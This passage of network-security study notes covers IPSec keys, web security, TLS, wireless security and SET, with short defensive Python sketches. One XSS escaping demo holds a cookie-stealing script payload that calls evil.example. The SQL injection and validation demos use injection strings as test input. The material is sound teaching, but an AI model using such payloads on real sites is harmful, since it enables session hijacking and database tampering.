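print(sad[(0x2001, "192.168.1.9", "ESP")])
```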
KEY MANAGEMENT: The key management portion of IPSec involves the
determination and distribution of secret keys.
Manual: A system administrator manually configures each system with its own keys
and with the keys of other communicating systems. This is practical for small, relatively
static environments.
Automated: An automated system enables the on-demand creation of keys for SAs
and facilitates the use of keys in a large distributed system with an evolving configuration.
The default automated key management protocol for IPSec is referred to as ISAKMP/Oakley and consists of the following elements:
• Oakley Key Determination Protocol: a key exchange protocol based on the Diffie–Hellman algorithm, with added security features.
• ISAKMP (Internet Security Association and Key Management Protocol): provides a framework for Internet key management and defines the formats used to negotiate security attributes.
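Since Oakley is based on the Diffie–Hellman key exchange, the toy Python sketch below illustrates the underlying key-agreement idea. The modulus shown is deliberately tiny and insecure; real IKE negotiations use large, standardized groups.

```python
# Toy Diffie-Hellman exchange, the key-agreement idea underlying Oakley/IKE.
# The modulus here is deliberately small for readability and is NOT secure;
# real IKE uses large, standardized groups (thousands of bits).
import secrets

p = 0xFFFFFFFB   # a small prime, for illustration only
g = 5

a = secrets.randbelow(p - 2) + 1   # initiator's private value
b = secrets.randbelow(p - 2) + 1   # responder's private value

A = pow(g, a, p)                   # initiator sends g^a mod p
B = pow(g, b, p)                   # responder sends g^b mod p

shared_initiator = pow(B, a, p)    # (g^b)^a mod p
shared_responder = pow(A, b, p)    # (g^a)^b mod p
assert shared_initiator == shared_responder
print(hex(shared_initiator))       # both sides now hold the same keying material
```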
Web Security:
Web security refers to protecting networks and computer systems from damage to, or the theft of, software, hardware, or data. It also includes protecting computer systems against attempts to misdirect or disrupt the services they are designed to provide.
The Web supports a wide collection of applications, such as multimedia and instant messaging.
The World Wide Web is fundamentally a client/server application running over the Internet
and TCP/IP intranets.
Security Consideration:
Updated Software: You need to always update your software. Hackers may be aware
of vulnerabilities in certain software, which are sometimes caused by bugs and can be
used to damage your computer system and steal personal data. Older versions of
software can become a gateway for hackers to enter your network. Software makers
soon become aware of these vulnerabilities and will fix vulnerable or exposed areas.
That is why it is important to keep your software updated; doing so plays an important role in keeping your personal data secure.
Beware of SQL Injection: SQL injection is an attempt to manipulate your data or your database by inserting rogue code into a query. For example, somebody can send a query to your website containing rogue code; when it gets executed, it can be used to manipulate your database, such as changing tables, modifying or deleting data, or retrieving sensitive information. So, one should be aware of the SQL injection attack and use parameterized queries, as in the sketch below.
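The sketch below illustrates the standard defense, a parameterized query, using Python's built-in sqlite3 module. The table, column, and input values are made up for illustration.

```python
# Minimal sketch of preventing SQL injection with a parameterized query
# (sqlite3 used for illustration; table and data are made up).
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (username TEXT, email TEXT)")
conn.execute("INSERT INTO users VALUES ('alice', 'alice@example.com')")

user_supplied = "alice' OR '1'='1"   # hostile input

# Unsafe: string concatenation would let the input rewrite the query.
# cur = conn.execute("SELECT * FROM users WHERE username = '" + user_supplied + "'")

# Safe: the placeholder keeps the input as data, never as SQL code.
cur = conn.execute("SELECT * FROM users WHERE username = ?", (user_supplied,))
print(cur.fetchall())   # [] -- the injection attempt matches nothing
```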
Cross-Site Scripting (XSS): XSS allows attackers to insert client-side script into web pages, for example through form submissions. It is a term used to describe a class of attacks that allow an attacker to inject client-side scripts into other users’ browsers through a website. Because the injected code reaches the browser from the site, it is treated as trusted and can do things like send the user’s site authorization cookie to the attacker. Escaping user-supplied output, as in the sketch below, neutralizes such injections.
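As a minimal illustration, the sketch below HTML-escapes a hostile form submission with Python's standard html module before echoing it back into a page, so the script is rendered as text rather than executed.

```python
# Minimal sketch of neutralizing a reflected XSS attempt by HTML-escaping
# user-supplied form input before writing it back into a page.
import html

submitted_comment = "<script>document.location='http://evil.example/?c='+document.cookie</script>"

safe_fragment = html.escape(submitted_comment)
page = "<p>Your comment: " + safe_fragment + "</p>"
print(page)   # the script tag is rendered as text, so the browser will not execute it
```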
Error Messages: Be very careful about the error messages your site generates for users. Error messages are produced for one reason or another while users access the website, and you should be careful about how much information they reveal. For example, on a failed login attempt, the error message should not tell the user which field was incorrect: the username or the password.
Data Validation: Data validation is the proper testing of any input supplied by a user or application. It prevents improperly formed data from entering the information system. Validation should be performed on both the server side and the client side; performing it on both sides provides defense in depth. Data validation should always occur when data is received from an outside party, especially if the data comes from untrusted sources. A server-side sketch follows.
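A minimal server-side validation sketch is shown below; the regular expressions are illustrative rules, not a complete validation policy.

```python
# Minimal sketch of server-side input validation: reject improperly formed
# data before it enters the information system. The rules below are examples.
import re

USERNAME_RE = re.compile(r"^[A-Za-z0-9_]{3,20}$")
EMAIL_RE = re.compile(r"^[^@\s]+@[^@\s]+\.[^@\s]+$")

def validate_registration(username: str, email: str) -> list[str]:
    errors = []
    if not USERNAME_RE.fullmatch(username):
        errors.append("username must be 3-20 letters, digits, or underscores")
    if not EMAIL_RE.fullmatch(email):
        errors.append("email address is not well formed")
    return errors

print(validate_registration("alice_01", "alice@example.com"))        # []
print(validate_registration("a; DROP TABLE users", "not-an-email"))  # two errors
```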
Password: Passwords provide the first line of defense against unauthorized access to your device and personal information, so it is necessary to use a strong password. Hackers often use sophisticated software that relies on brute force to crack passwords, so passwords must be complex to resist such attacks. It is good practice to enforce password requirements such as a minimum length of eight characters, including uppercase letters, lowercase letters, special characters, and numerals (see the sketch below).
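The sketch below illustrates both ideas: a simple complexity check matching the requirements above, and storage of a salted, slow PBKDF2 hash instead of the raw password. The iteration count and policy rules are illustrative choices.

```python
# Minimal sketch: enforce a basic password policy and store only a salted,
# slow hash (PBKDF2) rather than the password itself.
import hashlib
import os
import re

def password_meets_policy(pw: str) -> bool:
    return (len(pw) >= 8
            and re.search(r"[A-Z]", pw) is not None
            and re.search(r"[a-z]", pw) is not None
            and re.search(r"[0-9]", pw) is not None
            and re.search(r"[^A-Za-z0-9]", pw) is not None)

def hash_password(pw: str) -> tuple[bytes, bytes]:
    salt = os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", pw.encode(), salt, 200_000)
    return salt, digest

print(password_meets_policy("Tr!cky_Pass9"))   # True
salt, digest = hash_password("Tr!cky_Pass9")
print(digest.hex())
```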
Web Security Threats:
Two types of attacks are:
Passive attacks include eavesdropping on network traffic between browser and server and
gaining access to information on a Web site that is supposed to be restricted.
Active attacks include impersonating another user, altering messages in transit between
client and server, and altering information on a Web site.
Security Threats:
A threat is a possible event that can damage or harm an information system. A security threat is defined as a risk that can potentially harm computer systems and organizations. Whenever an individual or an organization creates a website, they are vulnerable to security attacks.
Security attacks are mainly aimed at stealing, altering, or destroying personal and confidential information, consuming hard drive space, and illegally accessing passwords. So whenever the website you created is vulnerable to security attacks, attackers may steal your data, alter or destroy your personal information, view your confidential information, and gain access to your passwords.
Transport Layer Security:
One of the most widely used security services is Transport Layer Security (TLS); the current version is Version 1.2, defined in RFC 5246. TLS is an Internet standard that evolved from a commercial protocol known as Secure Sockets Layer (SSL). Although SSL implementations are still around, SSL has been deprecated by the IETF and is disabled by most organizations offering TLS software. TLS is a general-purpose service implemented as a set of protocols that rely on TCP. At this level, there are two implementation choices. For full generality, TLS could be
provided as part of the underlying protocol suite and therefore be transparent to applications.
Alternatively, TLS can be embedded in specific packages. For example, most browsers come
equipped with TLS, and most Web servers have implemented the protocol.
TLS Architecture :
TLS is designed to make use of TCP to provide a reliable end-to-end secure service.
The TLS Record Protocol provides basic security services to various higher-layer protocols. In particular, the Hypertext Transfer Protocol (HTTP), which provides the transfer service for Web client/server interaction, can operate on top of TLS.
Three higher-layer protocols are defined as part of TLS: the Handshake Protocol, the Change Cipher Spec Protocol, and the Alert Protocol. These TLS-specific protocols are used in the management of TLS exchanges and are examined later in this section. A fourth protocol, the Heartbeat Protocol, is defined in a separate RFC and is also discussed subsequently in this section. Two important TLS concepts are the TLS session and the TLS connection:
■ Connection: A connection is a transport (in the OSI layering model definition) that provides a suitable type of service. For TLS, such connections are peer-to-peer relationships.
The connections are transient. Every connection is associated with one session.
■ Session: A TLS session is an association between a client and a server. Sessions are
created by the Handshake Protocol. Sessions define a set of cryptographic security
parameters, which can be shared among multiple connections. Sessions are used to avoid the
expensive negotiation of new security parameters for each connection.
Between any pair of parties (applications such as HTTP on client and server), there may be
multiple secure connections. In theory, there may also be multiple simultaneous sessions
between parties, but this feature is not used in practice. There are a number of states
associated with each session. Once a session is established, there is a current operating state
for both read and write (i.e., receive and send). In addition, during the Handshake Protocol,
pending read and write states are created. Upon successful conclusion of the Handshake
Protocol, the pending states become the current states.
A session state is defined by the following parameters:
■ Session identifier: An arbitrary byte sequence chosen by the server to identify an active or
resumable session state.
■ Peer certificate: An X.509v3 certificate of the peer. This element of the state may be null.
■ Cipher spec: Specifies the bulk data encryption algorithm (such as null, AES, etc.) and a hash algorithm (such as MD5 or SHA-1) used for MAC calculation. It also defines cryptographic attributes such as the hash_size.
■ Master secret: 48-byte secret shared between the client and server.
■ Is resumable: A flag indicating whether the session can be used to initiate new connections.
A connection state is defined by the following parameters:
■ Server and client random: Byte sequences that are chosen by the server and client for each
connection.
■ Server write MAC secret: The secret key used in MAC operations on data sent by the
server.
■ Client write MAC secret: The symmetric key used in MAC operations on data sent by
the client.
■ Server write key: The symmetric encryption key for data encrypted by the server and
decrypted by the client.
■ Client write key: The symmetric encryption key for data encrypted by the client and
decrypted by the server.
■ Initialization vectors: When a block cipher in CBC mode is used, an initialization vector
(IV) is maintained for each key. This field is first initialized by the TLS Handshake Protocol.
Thereafter, the final ciphertext block from each record is preserved for use as the IV with the
following record.
■ Sequence numbers: Each party maintains separate sequence numbers for transmitted and received messages for each connection. When a party sends or receives a “change cipher spec” message, the appropriate sequence number is set to zero. Sequence numbers may not exceed 2^64 - 1.
TLS Record Protocol
The TLS Record Protocol provides two services for TLS connections:
■ Confidentiality: The Handshake Protocol defines a shared secret key that is used for
conventional encryption of TLS payloads.
■ Message Integrity: The Handshake Protocol also defines a shared secret key that is used to
form a message authentication code (MAC).
Figure 17.3 indicates the overall operation of the TLS Record Protocol. The Record Protocol
takes an application message to be transmitted, fragments the data into manageable blocks,
optionally compresses the data, applies a MAC, encrypts, adds a header, and transmits the
resulting unit in a TCP segment. Received data are decrypted, verified, decompressed, and
reassembled before being delivered to higher-level users. The first step is fragmentation. Each upper-layer message is fragmented into blocks of 2^14 bytes (16,384 bytes) or less.
Next, compression is optionally applied. Compression must be lossless and may not increase the content length by more than 1024 bytes.
The next step is to compute a message authentication code over the compressed data, using the HMAC algorithm:

HMAC_hash(K, M) = hash[ (K+ XOR opad) || hash[ (K+ XOR ipad) || M ] ]

where
K+ = the secret key padded with zeros on the left so that the result is equal to the block length of the hash code (for MD5 and SHA-1, block length = 512 bits)
ipad = 00110110 (36 in hexadecimal) repeated 64 times (512 bits)
opad = 01011100 (5C in hexadecimal) repeated 64 times (512 bits)
|| = concatenation

For TLS, the MAC calculation encompasses the fields indicated in the following expression:

HMAC_hash(MAC_write_secret, seq_num || TLSCompressed.type || TLSCompressed.version || TLSCompressed.length || TLSCompressed.fragment)

The MAC calculation covers the sequence number and all of the TLSCompressed fields, including TLSCompressed.version, which is the version of the protocol being employed. Next, the compressed message plus the MAC are encrypted using symmetric encryption.
Encryption may not increase the content length by more than 1024 bytes, so that the total length may not exceed 2^14 + 2048. Both stream ciphers and block ciphers operating in CBC mode are permitted.
For stream encryption, the compressed message plus the MAC are encrypted. Note that the
MAC is computed before encryption takes place and that the MAC is then encrypted along
with the plaintext or compressed plaintext. For block encryption, padding may be added after
the MAC prior to encryption. The padding is in the form of a number of padding bytes
followed by a one-byte indication of the length of the padding. The padding can be any
amount that results in a total that is a multiple of the cipher’s block length, up to a maximum
of 255 bytes. For example, if the cipher block length is 16 bytes (e.g., AES) and if the
plaintext (or compressed text if compression is used) plus MAC plus padding length byte is
79 bytes long, then the padding length (in bytes) can be 1, 17, 33, and so on, up to 161. At a
padding length of 161, the total length is 79 + 161 = 240. A variable padding length may be
used to frustrate attacks based on an analysis of the lengths of exchanged messages.
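The following is a minimal Python sketch of the per-record MAC computation given in the expression above. The key, sequence number, and fragment contents are illustrative placeholders (a real implementation derives the MAC secret from the handshake key material), and SHA-256 is used here as the HMAC hash.

```python
# Minimal sketch of the per-record MAC computed by the TLS Record Protocol.
# Key, sequence number and fragment contents are illustrative only.
import hashlib
import hmac
import struct

mac_write_secret = b"\x0b" * 32      # illustrative key (normally from key derivation)
seq_num = 0
content_type = 23                    # application_data
version = (3, 3)                     # TLS 1.2 on the wire
fragment = b"hello over TLS"

mac_input = (struct.pack("!Q", seq_num)            # 64-bit sequence number
             + struct.pack("!B", content_type)     # TLSCompressed.type
             + struct.pack("!BB", *version)        # TLSCompressed.version
             + struct.pack("!H", len(fragment))    # TLSCompressed.length
             + fragment)                           # TLSCompressed.fragment

record_mac = hmac.new(mac_write_secret, mac_input, hashlib.sha256).digest()
print(record_mac.hex())
```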
The final step of TLS Record Protocol processing is to prepend a header consisting of the
following fields:
■ Content Type (8 bits): The higher-layer protocol used to process the enclosed fragment.
■ Major Version (8 bits): Indicates major version of TLS in use. For TLSv1.2, the value is 3.
■ Minor Version (8 bits): Indicates minor version in use. For TLSv1.2, the value is 3.
■ Compressed Length (16 bits): The length in bytes of the plaintext fragment (or compressed fragment if compression is used). The maximum value is 2^14 + 2048. The content types that have been defined are change_cipher_spec, alert, handshake, and application_data. The first three are the TLS-specific protocols, discussed next. Note that no distinction is made among
the various applications (e.g., HTTP) that might use TLS; the content of the data created by
such applications is opaque to TLS.
Handshake Protocol :
The most complex part of TLS is the Handshake Protocol. This protocol allows the server
and client to authenticate each other and to negotiate an encryption and MAC algorithm and
cryptographic keys to be used to protect data sent in a TLS record. The Handshake Protocol
is used before any application data is transmitted. The Handshake Protocol consists of a
series of messages exchanged by client and server.
All of these have the format shown in Figure 17.5c. Each message has three fields:
■ Type (1 byte): Indicates one of 10 messages. Table 17.2 lists the defined message types.
■ Length (3 bytes): The length of the message in bytes.
■ Content (≥ 0 bytes): The parameters associated with this message; these are listed in Table 17.2.
Figure 17.6 shows the initial exchange needed to establish a logical connection between
client and server. The exchange can be viewed as having four phases.
Phase 1 initiates a logical connection and establishes the security capabilities that will be
associated with it.
The exchange is initiated by the client, which sends a client_hello message with the
following parameters:
■ Session ID: A variable-length session identifier. A nonzero value indicates that the client
wishes to update the parameters of an existing connection or to create a new connection on
this session. A zero value indicates that the client wishes to establish a new connection on a
new session.
WIRELESS SECURITY :
Wireless networks, and the wireless devices that use them, introduce a host of security
problems over and above those found in wired networks. Some of the key factors
contributing to the higher security risk of wireless networks compared to wired networks
include the following [MA10]:
■ Resources: Some wireless devices, such as smartphones and tablets, have sophisticated
operating systems but limited memory and processing resources with which to counter
threats, including denial of service and malware.
■ Accessibility: Some wireless devices, such as sensors and robots, may be left unattended
in remote and/or hostile locations. This greatly increases their vulnerability to physical
attacks.
In simple terms, the wireless environment consists of three components that provide point of
attack (Figure 18.1). The wireless client can be a cell phone, a Wi-Fi–enabled laptop or
tablet, a wireless sensor, a Bluetooth device, and so on. The wireless access point provides a
connection to the network or service. Examples of access points are cell towers, Wi-Fi
hotspots, and wireless access points to wired local or wide area networks. The transmission
medium, which carries the radio waves for data transfer, is also a source of vulnerability.
Wireless Network Threats
[CHOI08] lists the following security threats to wireless networks:
■ Accidental association: Company wireless LANs or wireless access points to wired LANs
in close proximity (e.g., in the same or neighboring buildings) may create overlapping
transmission ranges. A user intending to connect to one LAN may unintentionally lock on to
a wireless access point from a neighboring network. Although the security breach is
accidental, it nevertheless exposes resources of one LAN to the accidental user.
■ Ad hoc networks: These are peer-to-peer networks between wireless computers with no
access point between them. Such networks can pose a security threat due to a lack of a central
point of control.
■ Man-in-the-middle attacks: This type of attack is described in Chapter 10 in the context of
the Diffie–Hellman key exchange protocol. In a broader sense, this attack involves
persuading a user and an access point to believe that they are talking to each other when in
fact the communication is going through an intermediate attacking device. Wireless networks
are particularly vulnerable to such attacks.
■ Denial of service (DoS): This type of attack is discussed in detail in Chapter 21. In the
context of a wireless network, a DoS attack occurs when an attacker continually bombards a
wireless access point or some other accessible wireless port with various protocol messages
designed to consume system resources. The wireless environment lends itself to this type of
attack, because it is so easy for the attacker to direct multiple wireless messages at the target.
■ Network injection: A network injection attack targets wireless access points that are
exposed to nonfiltered network traffic, such as routing protocol messages or network
management messages. An example of such an attack is one in which bogus reconfiguration
commands are used to affect routers and switches to degrade network performance.
Wireless Security Measures
Following [CHOI08], we can group wireless security measures into those dealing with wireless transmissions, wireless access points, and wireless networks (consisting of wireless routers and endpoints).
SECURING WIRELESS TRANSMISSIONS
The principal threats to wireless transmission are eavesdropping, altering or inserting messages, and disruption.
SECURING WIRELESS ACCESS POINTS
The main threat involving wireless access points is unauthorized access to the network. The
principal approach for preventing such access is the IEEE 802.1X standard for port-based
network access control. The standard provides an authentication mechanism for devices
wishing to attach to a LAN or wireless network. The use of 802.1X can prevent rogue access
points and other unauthorized devices from becoming insecure backdoors. Section 16.3 provides an introduction to 802.1X.
SECURING WIRELESS NETWORKS
The following techniques can be used to secure wireless networks:
1. Use encryption. Wireless routers are typically equipped with built-in encryption
mechanisms for router-to-router traffic
2. Use antivirus and antispyware software, and a firewall. These facilities should be enabled
on all wireless network endpoints.
3. Turn off identifier broadcasting. Wireless routers are typically configured to broadcast
an identifying signal so that any device within range can learn of the router’s existence. If
a network is configured so that authorized devices know the identity of routers, this
capability can be disabled, so as to thwart attackers.
4. Change the identifier on your router from the default. Again, this measure thwarts
attackers who will attempt to gain access to a wireless network using default router
identifiers.
5. Change your router’s pre-set password for administration. This is another prudent step.
6. Allow only specific computers to access your wireless network. A router can be
configured to only communicate with approved MAC addresses. Of course, MAC
addresses can be spoofed, so this is just one element of a security strategy.
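As a toy illustration of item 6 above, the sketch below checks a client's MAC address against an approved list. Real filtering is performed by the router firmware, and MAC addresses can be spoofed, so this is only one layer of defense; the addresses shown are made up.

```python
# Toy sketch of MAC-address filtering: accept association only from approved
# addresses. Addresses are illustrative; spoofing makes this one layer only.
APPROVED_MACS = {"aa:bb:cc:dd:ee:01", "aa:bb:cc:dd:ee:02"}

def allow_association(client_mac: str) -> bool:
    return client_mac.lower() in APPROVED_MACS

print(allow_association("AA:BB:CC:DD:EE:01"))   # True
print(allow_association("de:ad:be:ef:00:00"))   # False
```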
Handshake Protocol:
Handshake Protocol is used to establish sessions. This protocol allows the client and server to
authenticate each other by sending a series of messages to each other. Handshake protocol
uses four phases to complete its cycle.
Phase-1: In Phase-1, both client and server send hello packets to each other. In this exchange, the session ID, cipher suite, and protocol version are exchanged for security purposes.
Phase-2: The server sends its certificate and the Server-key-exchange message. The server ends Phase-2 by sending the Server-hello-done packet.
Phase-3: In this phase, the client replies to the server by sending its certificate and the Client-key-exchange message.
Phase-4: In Phase-4, the Change-cipher-spec exchange occurs, and after this the Handshake Protocol ends.
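For a concrete view of the handshake, the sketch below uses Python's standard ssl module, which carries out the full handshake (hello exchange, certificate, key exchange, and change-cipher) when it wraps a TCP socket. The host name is an example; any TLS-enabled server would do.

```python
# Minimal sketch: Python's ssl module performs the full handshake when
# wrapping a socket; the host name below is only an example.
import socket
import ssl

context = ssl.create_default_context()          # also verifies the server certificate

with socket.create_connection(("example.com", 443)) as raw_sock:
    with context.wrap_socket(raw_sock, server_hostname="example.com") as tls_sock:
        # The handshake has completed by this point.
        print("negotiated version:", tls_sock.version())
        print("cipher suite:", tls_sock.cipher())
```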
Change-cipher Protocol:
This protocol uses the SSL Record Protocol. Until the Handshake Protocol is completed, the SSL record output remains in a pending state; after the handshake, the pending state is converted into the current state.
Change-cipher protocol consists of a single message which is 1 byte in length and can have
only one value. This protocol’s purpose is to cause the pending state to be copied into the
current state.
Alert Protocol:
This protocol is used to convey SSL-related alerts to the peer entity. Each message in this
protocol contains 2 bytes.
SSL (Secure Sockets Layer) certificate is a digital certificate used to secure and verify the
identity of a website or an online service. The certificate is issued by a trusted third-party
called a Certificate Authority (CA), who verifies the identity of the website or service before
issuing the certificate.
The SSL certificate has several important characteristics that make it a reliable solution for
securing online transactions:
1. Encryption: The SSL certificate uses encryption algorithms to secure the communication
between the website or service and its users. This ensures that the sensitive information,
such as login credentials and credit card information, is protected from being intercepted
and read by unauthorized parties.
2. Authentication: The SSL certificate verifies the identity of the website or service,
ensuring that users are communicating with the intended party and not with an impostor.
This provides assurance to users that their information is being transmitted to a trusted
entity.
3. Integrity: The SSL certificate uses message authentication codes (MACs) to detect any
tampering with the data during transmission. This ensures that the data being transmitted
is not modified in any way, preserving its integrity.
4. Non-repudiation: SSL certificates provide non-repudiation of data, meaning that the
recipient of the data cannot deny having received it. This is important in situations where
the authenticity of the information needs to be established, such as in e-commerce
transactions.
5. Public-key cryptography: SSL certificates use public-key cryptography for secure key
exchange between the client and server. This allows the client and server to securely
exchange encryption keys, ensuring that the encrypted information can only be decrypted
by the intended recipient.
6. Session management: SSL certificates allow for the management of secure sessions,
allowing for the resumption of secure sessions after interruption. This helps to reduce the
overhead of establishing a new secure connection each time a user accesses a website or
service.
7. Certificates issued by trusted CAs: SSL certificates are issued by trusted CAs, who are
responsible for verifying the identity of the website or service before issuing the
certificate. This provides a high level of trust and assurance to users that the website or
service they are communicating with is authentic and trustworthy.
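As a small illustration of these characteristics, the sketch below retrieves and inspects the certificate a server presents, using Python's standard ssl module; the host name is an example.

```python
# Minimal sketch of inspecting the SSL/TLS certificate a server presents.
import socket
import ssl

context = ssl.create_default_context()
with socket.create_connection(("example.com", 443)) as sock:
    with context.wrap_socket(sock, server_hostname="example.com") as tls:
        cert = tls.getpeercert()      # parsed certificate fields as a dict

print("issued to  :", dict(item[0] for item in cert["subject"]))
print("issued by  :", dict(item[0] for item in cert["issuer"]))
print("valid until:", cert["notAfter"])
```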
Requirements in SET: The SET protocol has to meet a number of requirements; some of the important ones are:
It has to provide mutual authentication i.e., customer (or cardholder) authentication by
confirming if the customer is an intended user or not, and merchant authentication.
It has to keep the PI (Payment Information) and OI (Order Information) confidential by
appropriate encryptions.
It has to be resistive against message modifications i.e., no changes should be allowed in
the content being transmitted.
SET also needs to provide interoperability and make use of the best security mechanisms.
Participants in SET: In the general scenario of online transactions, SET includes similar
participants:
1. Cardholder – customer
2. Issuer – customer financial institution
3. Merchant
4. Acquirer – merchant's financial institution
5. Certificate authority – authority that follows certain standards and issues certificates (like X.509v3) to all other participants.
SET functionalities:
Provide Authentication
Merchant Authentication – To prevent theft, SET allows customers to check
previous relationships between merchants and financial institutions. Standard
X.509V3 certificates are used for this verification.
Customer / Cardholder Authentication – SET checks if the use of a credit card
is done by an authorized user or not using X.509V3 certificates.
Provide Message Confidentiality: Confidentiality refers to preventing unintended people
from reading the message being transferred. SET implements confidentiality by using
encryption techniques. Traditionally DES is used for encryption purposes.
Provide Message Integrity: SET does not allow message modification; this is achieved with the help of signatures. Messages are protected against unauthorized modification using RSA digital signatures with SHA-1, and in some cases HMAC with SHA-1.
Dual Signature: The dual signature is a concept introduced with SET, which aims at
connecting two information pieces meant for two different receivers :
Order Information (OI) for merchant
Payment Information (PI) for bank
You might think that sending them separately is an easier and more secure way, but sending them in a connected form resolves possible future disputes. The dual signature is generated by hashing the PI and OI separately, hashing the concatenation of those digests, and signing the result with the customer's private key, as sketched below:
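The following Python sketch illustrates the dual-signature construction and its verification. The PI/OI contents and RSA key are illustrative, SHA-256 is used purely for the sketch (SET originally used SHA-1), and the third-party cryptography package is assumed.

```python
# Minimal sketch of SET's dual signature: hash PI and OI separately, hash the
# concatenation of those digests (POMD), and sign with the customer's private key.
import hashlib
from cryptography.hazmat.primitives import hashes
from cryptography.hazmat.primitives.asymmetric import rsa, padding

customer_key = rsa.generate_private_key(public_exponent=65537, key_size=2048)

pi = b"card=4111...; amount=49.99"      # Payment Information (for the bank)
oi = b"order=book#123; qty=1"           # Order Information (for the merchant)

pimd = hashlib.sha256(pi).digest()                  # PIMD
oimd = hashlib.sha256(oi).digest()                  # OIMD
pomd = hashlib.sha256(pimd + oimd).digest()         # POMD = H(PIMD || OIMD)

dual_signature = customer_key.sign(pomd, padding.PKCS1v15(), hashes.SHA256())

# Merchant-side check: recompute POMD from the received PIMD and OI, then
# verify the dual signature with the customer's public key (KUC).
merchant_pomd = hashlib.sha256(pimd + hashlib.sha256(oi).digest()).digest()
customer_key.public_key().verify(dual_signature, merchant_pomd,
                                 padding.PKCS1v15(), hashes.SHA256())
print("dual signature verified")
```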
Purchase Request Generation: The process of purchase request generation requires three
inputs:
Payment Information (PI)
Dual Signature
Order Information Message Digest (OIMD)
The purchase request is generated as follows:
Purchase Request Validation on the Merchant Side: The merchant verifies the request by comparing the POMD computed by hashing the PIMD together with the OIMD against the POMD obtained by decrypting the dual signature.
Since the customer's private key was used to create the dual signature, the merchant uses KUC, the public key of the customer (cardholder), for the decryption D.
Payment Authorization and Payment Capture: Payment authorization, as the name suggests, is the authorization of the payment information, which ensures that the merchant will receive payment. Payment capture is the process by which the merchant actually receives payment; it again involves generating request blocks to the payment gateway, and the payment gateway in turn issues payment to the merchant.
The disadvantages of Secure Electronic Transaction: When SET was first introduced in 1996 by the SET consortium (Visa, Mastercard, Microsoft, Verisign, and so forth), it was expected to be widely adopted within the following few years. Industry analysts also predicted that it would quickly become the key enabler of global e-commerce. However, this did not happen, largely because of several serious weaknesses in how the protocol had to be deployed.
The security properties of SET are better than those of SSL and the newer TLS, especially in their ability to prevent e-commerce fraud. However, the biggest drawback of SET is its complexity. SET requires both customers and merchants to install special software, such as card readers and digital wallets, meaning that transaction participants had to do more work to implement SET. This complexity also slowed down the speed of e-commerce transactions. SSL and TLS do not have such issues.
The costs associated with PKI and with the initialization and enrollment processes also slowed the widespread adoption of SET. Interoperability among SET products, for example certificate translations and interpretations among trusted third parties with different certificate policies, was also a significant problem, and SET was further challenged by poor usability and the vulnerability of PKI.